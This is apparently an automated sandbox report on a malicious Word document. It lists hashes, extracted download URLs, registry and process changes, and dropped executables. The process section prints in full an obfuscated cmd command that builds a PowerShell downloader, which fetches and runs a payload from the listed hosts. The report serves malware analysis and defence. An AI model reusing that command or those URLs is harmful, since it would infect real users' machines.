Analysis
-
max time kernel
137s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
17-06-2024 20:33
Behavioral task
behavioral1
Sample
b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc
Resource
win10v2004-20240611-en
General
-
Target
b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc
-
Size
147KB
-
MD5
b9ea54d7115c94d28eb87047cda990e1
-
SHA1
5bc51c3fd4ce45cf1e185c3fac0daffdbdf338c5
-
SHA256
962ff19f56b94669106e2eb69ef717e0a590591608370c41b239a0649d19cfb2
-
SHA512
aa6eaf72f92b00475c6dd6bc6a6f00ac6576b9258b69d32e013052f5f21157c698eeec1d8d7173d12cb9ab392b8ba545bebcae9d60df413edadef9334c913b2a
-
SSDEEP
1536:F81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9OUVk0mksZHT:F8GhDS0o9zTGOZD6EbzCda0mkmHT
Malware Config
Extracted
http://alistairmccoy.co.uk/0R
http://erinkveld.eu/tKlZyU
http://dentaware.com/PbF
http://havmore.in/UXxra
http://aphn.org/zTADPIb
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2548 1928 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 5 2704 powershell.exe 7 2704 powershell.exe 8 2704 powershell.exe 9 2704 powershell.exe 11 2704 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
38.exe38.exeballoonclear.exeballoonclear.exepid process 1720 38.exe 2580 38.exe 2960 balloonclear.exe 2620 balloonclear.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exe38.exepid process 2704 powershell.exe 1720 38.exe -
Drops file in System32 directory 1 IoCs
Processes:
balloonclear.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat balloonclear.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE -
Modifies data under HKEY_USERS 18 IoCs
Processes:
balloonclear.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" balloonclear.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501} balloonclear.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-e3-be-98-6b-ea balloonclear.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}\6a-e3-be-98-6b-ea balloonclear.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-e3-be-98-6b-ea\WpadDecisionReason = "1" balloonclear.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f011e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 balloonclear.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-e3-be-98-6b-ea\WpadDecisionTime = e0ee8fb8f5c0da01 balloonclear.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}\WpadDecision = "0" balloonclear.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings balloonclear.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections balloonclear.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 balloonclear.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 balloonclear.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad balloonclear.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}\WpadDecisionReason = "1" balloonclear.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}\WpadDecisionTime = e0ee8fb8f5c0da01 balloonclear.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-e3-be-98-6b-ea\WpadDecision = "0" balloonclear.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings balloonclear.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}\WpadNetworkName = "Network 3" balloonclear.exe -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1928 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exe38.exe38.exeballoonclear.exeballoonclear.exepid process 2704 powershell.exe 1720 38.exe 2580 38.exe 2960 balloonclear.exe 2620 balloonclear.exe 2620 balloonclear.exe 2620 balloonclear.exe 2620 balloonclear.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2704 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1928 WINWORD.EXE 1928 WINWORD.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
WINWORD.EXEcmd.execmd.exepowershell.exe38.exeballoonclear.exedescription pid process target process PID 1928 wrote to memory of 3040 1928 WINWORD.EXE splwow64.exe PID 1928 wrote to memory of 3040 1928 WINWORD.EXE splwow64.exe PID 1928 wrote to memory of 3040 1928 WINWORD.EXE splwow64.exe PID 1928 wrote to memory of 3040 1928 WINWORD.EXE splwow64.exe PID 1928 wrote to memory of 2548 1928 WINWORD.EXE cmd.exe PID 1928 wrote to memory of 2548 1928 WINWORD.EXE cmd.exe PID 1928 wrote to memory of 2548 1928 WINWORD.EXE cmd.exe PID 1928 wrote to memory of 2548 1928 WINWORD.EXE cmd.exe PID 2548 wrote to memory of 2516 2548 cmd.exe cmd.exe PID 2548 wrote to memory of 2516 2548 cmd.exe cmd.exe PID 2548 wrote to memory of 2516 2548 cmd.exe cmd.exe PID 2548 wrote to memory of 2516 2548 cmd.exe cmd.exe PID 2516 wrote to memory of 2704 2516 cmd.exe powershell.exe PID 2516 wrote to memory of 2704 2516 cmd.exe powershell.exe PID 2516 wrote to memory of 2704 2516 cmd.exe powershell.exe PID 2516 wrote to memory of 2704 2516 cmd.exe powershell.exe PID 2704 wrote to memory of 1720 2704 powershell.exe 38.exe PID 2704 wrote to memory of 1720 2704 powershell.exe 38.exe PID 2704 wrote to memory of 1720 2704 powershell.exe 38.exe PID 2704 wrote to memory of 1720 2704 powershell.exe 38.exe PID 1720 wrote to memory of 2580 1720 38.exe 38.exe PID 1720 wrote to memory of 2580 1720 38.exe 38.exe PID 1720 wrote to memory of 2580 1720 38.exe 38.exe PID 1720 wrote to memory of 2580 1720 38.exe 38.exe PID 2960 wrote to memory of 2620 2960 balloonclear.exe balloonclear.exe PID 2960 wrote to memory of 2620 2960 balloonclear.exe balloonclear.exe PID 2960 wrote to memory of 2620 2960 balloonclear.exe balloonclear.exe PID 2960 wrote to memory of 2620 2960 balloonclear.exe balloonclear.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3040
-
\??\c:\windows\SysWOW64\cmd.exec:\bTorQSzoJk\vIzwwzd\TBWRXjkRVBf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\SysWOW64\cmd.exeCmD /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""3⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
